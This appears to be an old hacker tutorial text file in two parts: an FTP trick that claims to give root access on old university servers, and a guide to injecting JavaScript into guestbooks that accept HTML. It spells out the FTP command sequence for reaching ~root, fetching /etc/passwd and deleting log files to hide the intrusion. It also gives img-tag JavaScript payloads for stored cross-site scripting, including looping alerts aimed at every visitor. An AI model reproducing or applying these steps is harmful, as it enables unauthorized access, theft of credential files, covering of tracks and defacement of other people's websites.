Note This Exploit Only Works With Stupid Admins And Most Of The Older Sites Like College UNVs TYPE ftp victim.com server will ask for username press enter server will ask for password press enter at the prompt type quote user ftp then type quote cwd ~root then type quote pass ftp Make sure that you delt the log file they might look at it and see that you where on. The password file for who is and isnt allowed on the system is in the directory /etc/passwd so for you lamers once you got on the system type cd etc the type get passwd. If you have done the above right and the server is a little old you will have root access. For you lamers root acces is the highest security status you can have. Note: This will work on most servers the older ones like University's use.

Guestbook terror with javascript
Since the guestbook allows HTML tag you could sneak in some Javascript in a few tags. The one i used is the <img src=""> tag, the thing is that it leaves a picture, so it's easy to find, you will understand what i mean when you try it.
Step one: Check if the guestbook is allowing HTML tags, Write in a name and type this in the message box: <marquee>Checking</marquee> and click post. i go for the marquee tag becuse a <b > tag sometimes dont show so well. Ok, if the text "Checking" comes sliding from the rigth to the left, it's a good sign!
Step two: Now we need to put in some Javascript, ex. Javascript:alert('I RULE!!') that will bring up a, box that says "I RULE". Of course could you type in other things. Or loop it, so everyone that visits the guestbook gets alot of message boxes, ALOT of them.
So to get up a message box that says i rule or anything else, type <img src="Javascript:alert('YOURTEXT')">
that's it! oh, you want to know more commands?...... fine, im nice today so:
<img src="Javascript:(window.status = 'Andgus rules!')"> That will show the text "Andgus rules" in the status bar
or
you study Javascript to learn a few new tricks.
